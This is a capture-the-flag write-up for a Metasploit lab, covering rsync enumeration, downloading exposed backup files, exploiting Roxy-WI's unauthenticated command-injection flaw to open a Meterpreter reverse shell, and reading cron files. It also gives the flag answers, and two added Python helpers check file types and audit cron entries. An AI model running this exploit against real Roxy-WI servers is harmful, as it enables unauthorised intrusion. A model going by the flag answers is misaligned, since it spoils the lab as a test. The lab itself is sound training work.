The Metasploit Framework CTF 2
Overview
Linux-based systems are frequently targeted in penetration tests due to their prevalence in server environments. This lab focuses on using the Metasploit Framework (MSF) to exploit misconfigured services and vulnerable applications on Linux systems. Participants will leverage MSF to enumerate services, explore file systems, and exploit web applications to achieve shell access.
In this lab environment, you will have GUI access to a Kali Linux machine. Two machines are accessible at target1.ine.local and target2.ine.local.
Objective: Using various exploration techniques, complete the following tasks to capture the associated flags:
Flag 1: Enumerate the open port using Metasploit, and inspect the RSYNC banner closely; it might reveal something interesting.
Flag 2: The files on the RSYNC server hold valuable information. Explore the contents to find the flag.
Flag 3: Try exploiting the webapp to gain a shell using Metasploit on target2.ine.local.
Flag 4: Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag.
Writeup
Flag 1
We open Metasploit and run an nmap scan. We find only one open port:
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.167.25.3 873 tcp rsync open protocol version 31
msf6 auxiliary(scanner/rsync/modules_list) > rsync rsync://target1.ine.local
[*] exec: rsync rsync://target1.ine.local
backupwscohen FLAG1_***
Answer
5605f4de3653422ab2ec051078582135
Flag 2
We found the backupwscohen module. Let's see what it contains.
msf6 auxiliary(scanner/rsync/modules_list) > rsync rsync://target1.ine.local/backupwscohen
[*] exec: rsync rsync://target1.ine.local/backupwscohen
drwxr-xr-x 4,096 2025/04/08 19:45:58 .
-rw-r--r-- 20 2024/10/28 15:05:40 TPSData.txt
-rw-r--r-- 25 2024/10/28 15:05:40 office_staff.vhd
-rw-r--r-- 39 2025/04/08 19:45:58 pii_data.xlsx
We download the files using the -avz option.
The vhd file is a backup, the xlsx file does not open, and the txt file does not contain much. Let's try unzipping the xlsx file.
┌──(root㉿INE)-[~]
└─# unzip -l pii_data.xlsx -d extract
caution: not extracting; -d ignored
Archive: pii_data.xlsx
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
unzip: cannot find zipfile directory in one of pii_data.xlsx or
pii_data.xlsx.zip, and cannot find pii_data.xlsx.ZIP, period.
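The failed unzip above shows why a file's extension should not be trusted. As an added example (not part of the original writeup), this Python helper classifies each downloaded file by its magic bytes and reports names whose extension disagrees with the content; the sample file contents are constructed.

```python
# Identify files by content, not extension. Added for this writeup: the module
# served a 25-byte "vhd" and a 39-byte "xlsx", and unzip found no ZIP directory.
# A ZIP needs at least its 22-byte end-of-central-directory record, and a VHD
# image ends in a 512-byte footer beginning with the cookie "conectix", so the
# 25-byte "vhd" cannot be a disk image at all.
ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06")  # local file header / empty archive
VHD_COOKIE = b"conectix"
VHD_FOOTER_SIZE = 512

# Container type implied by each extension (xlsx and docx are ZIP containers).
CLAIMS = {"xlsx": "zip", "docx": "zip", "zip": "zip", "vhd": "vhd", "txt": "text"}


def identify(data: bytes) -> str:
    """Return 'zip', 'vhd', 'text' or 'binary' from the bytes themselves."""
    if data[:4] in ZIP_MAGICS:
        return "zip"
    if len(data) >= VHD_FOOTER_SIZE and (
        data[-VHD_FOOTER_SIZE:].startswith(VHD_COOKIE) or data.startswith(VHD_COOKIE)
    ):
        return "vhd"  # dynamic VHDs also keep a copy of the footer at offset 0
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    return "text" if all(c.isprintable() or c in "\r\n\t" for c in text) else "binary"


def check_file(name: str, data: bytes) -> dict:
    """Compare the type the extension claims with the type found in the bytes."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    claimed = CLAIMS.get(ext, "unknown")
    actual = identify(data)
    return {"name": name, "claimed": claimed, "actual": actual,
            "mismatch": claimed not in ("unknown", actual)}


# Constructed stand-ins for the three files in the listing (contents are made up).
SAMPLE_FILES = {
    "TPSData.txt": b"TPS report, Q3 2024\n",
    "office_staff.vhd": b"not really a disk image\n",
    "pii_data.xlsx": b"plain text, not a spreadsheet\n",
}


def mismatched(files: dict) -> list:
    """Names whose extension does not match their content."""
    return [n for n, d in files.items() if check_file(n, d)["mismatch"]]
```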
Answer
d1b8eee3b2d94346933e21ccf84f4f4f
Flag 3
We run an nmap scan on target2.ine.local.
msf6 auxiliary(scanner/rsync/modules_list) > db_nmap -sC -sV target2.ine.local
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-08 20:12 IST
[*] Nmap: Nmap scan report for target2.ine.local (192.167.25.4)
[*] Nmap: Host is up (0.000024s latency).
[*] Nmap: Not shown: 998 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
[*] Nmap: |_http-server-header: Apache/2.4.52 (Ubuntu)
[*] Nmap: |_http-title: Roxy-WI
[*] Nmap: 443/tcp open ssl/http Apache httpd 2.4.52
[*] Nmap: |_http-server-header: Apache/2.4.52 (Ubuntu)
[*] Nmap: |_ssl-date: TLS randomness does not represent time
[*] Nmap: | tls-alpn:
[*] Nmap: |_ http/1.1
[*] Nmap: | ssl-cert: Subject: commonName=*.roxy-wi.org/organizationName=Roxy-WI/stateOrProvinceName=Almaty/countryName=US
[*] Nmap: | Not valid before: 2022-07-29T05:20:44
[*] Nmap: |_Not valid after: 2050-12-14T05:20:44
[*] Nmap: |_http-title: Roxy-WI
[*] Nmap: MAC Address: 02:42:C0:A7:19:04 (Unknown)
[*] Nmap: Service Info: Host: roxy-wi.example.com
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 13.76 seconds
The web application is Roxy-WI. Let's check if there are known vulnerabilities.
msf6 auxiliary(scanner/rsync/modules_list) > search Roxy_wi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/roxy_wi_exec 2022-07-06 excellent Yes Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE
1 \_ target: Unix (In-Memory) . . . .
2 \_ target: Linux (Dropper) . . . .
Interact with a module by name or index. For example info 2, use 2 or use exploit/linux/http/roxy_wi_exec
After interacting with a module you can manually set a TARGET with set TARGET 'Linux (Dropper)'
msf6 auxiliary(scanner/rsync/modules_list) > use 0
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 192.167.25.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.167.25.4:443 is vulnerable!
[*] 192.167.25.4:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Exploiting...
[*] Sending stage (24772 bytes) to 192.167.25.4
[*] Meterpreter session 1 opened (192.167.25.2:4444 -> 192.167.25.4:38984) at 2025-04-08 20:14:41 +0530
meterpreter > sysinfo
Computer : target2.ine.local
OS : Linux 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024
Architecture : x64
Meterpreter : python/linux
meterpreter > cd /
meterpreter > ls
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100755/rwxr-xr-x 0 fil 2025-04-08 19:45:56 +0530 .dockerenv
040755/rwxr-xr-x 4096 dir 2022-07-29 11:01:41 +0530 bin
040755/rwxr-xr-x 4096 dir 2022-04-18 15:58:59 +0530 boot
040755/rwxr-xr-x 340 dir 2025-04-08 19:45:56 +0530 dev
040755/rwxr-xr-x 4096 dir 2025-04-08 19:45:56 +0530 etc
100644/rw-r--r-- 39 fil 2025-04-08 19:45:56 +0530 flag.txt
040755/rwxr-xr-x 4096 dir 2022-04-18 15:58:59 +0530 home
040755/rwxr-xr-x 4096 dir 2022-07-28 19:03:58 +0530 lib
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:11 +0530 lib32
040755/rwxr-xr-x 4096 dir 2022-05-31 21:13:16 +0530 lib64
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:11 +0530 libx32
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:12 +0530 media
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:12 +0530 mnt
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:12 +0530 opt
040555/r-xr-xr-x 0 dir 2025-04-08 19:45:56 +0530 proc
040700/rwx------ 4096 dir 2022-07-28 19:09:04 +0530 root
040755/rwxr-xr-x 4096 dir 2025-04-08 19:46:09 +0530 run
040755/rwxr-xr-x 4096 dir 2022-07-28 19:03:45 +0530 sbin
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:12 +0530 srv
040555/r-xr-xr-x 0 dir 2024-08-15 21:22:53 +0530 sys
041777/rwxrwxrwx 4096 dir 2025-04-08 19:46:09 +0530 tmp
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:12 +0530 usr
040755/rwxr-xr-x 4096 dir 2022-07-28 19:02:55 +0530 var
meterpreter > cat flag.txt
Answer
5f21b11d6df44853b531d7ed3dfbb954
Flag 4
Running crontab -l shows nothing. Let's check the /etc/cron.d folder.
www-data@target2:/etc/cron.d$ ls
e2scrub_all
www-data-cron
www-data@target2:/etc/cron.d$ cat e2scrub_all
30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
www-data@target2:/etc/cron.d$ cat www-data-cron
* * * * * www-data echo "FLAG4_****"
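The two cron.d files above differ in exactly the ways a reviewer should flag. As an added example (not part of the original writeup), this Python script parses /etc/cron.d-style entries, which carry a user field that per-user crontabs lack, and reports jobs that run every minute, run under a non-root account, or embed a quoted literal while calling no program by path; the sample input reproduces the two files as shown, with the flag masked.

```python
import re
from dataclasses import dataclass, field

# Sample input: the two /etc/cron.d files from the writeup (flag masked as on the
# page). Cron command lines are readable by every local user via ps and /proc.
CRON_FILES = {
    "e2scrub_all": (
        "30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 "
        "/usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron\n"
        "10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r\n"
    ),
    "www-data-cron": '* * * * * www-data echo "FLAG4_****"\n',
}

# /etc/cron.d lines carry a sixth field, the user, that per-user crontabs lack;
# @reboot-style lines have a single time field instead of five.
SYSTEM_CRON_RE = re.compile(r"^(?P<sched>@\S+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")

@dataclass
class CronJob:
    source: str
    schedule: str
    user: str
    command: str
    findings: list = field(default_factory=list)

def parse_cron_d(files: dict) -> list:
    """Parse every job line of each cron.d file into a CronJob record."""
    jobs = []
    for name, body in files.items():
        for raw in body.splitlines():
            line = raw.strip()
            if not line or line.startswith("#") or "=" in line.split()[0]:
                continue  # skip comments and NAME=value environment lines
            m = SYSTEM_CRON_RE.match(line)
            if m:
                jobs.append(CronJob(name, re.sub(r"\s+", " ", m.group("sched")),
                                    m.group("user"), m.group("cmd")))
    return jobs

def audit_cron_d(files: dict) -> list:
    """Parse and attach review findings: odd schedule, odd account, bare literal."""
    jobs = parse_cron_d(files)
    for job in jobs:
        if job.schedule == "* * * * *":
            job.findings.append("runs every minute")
        if job.user != "root":
            job.findings.append(f"runs as {job.user}; check who may edit {job.source}")
        if re.search(r"""(["']).*\1""", job.command) and "/" not in job.command:
            job.findings.append("echoes a quoted literal and calls no program by path")
    return jobs
```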
Answer
40817d4376354af291507611917209c2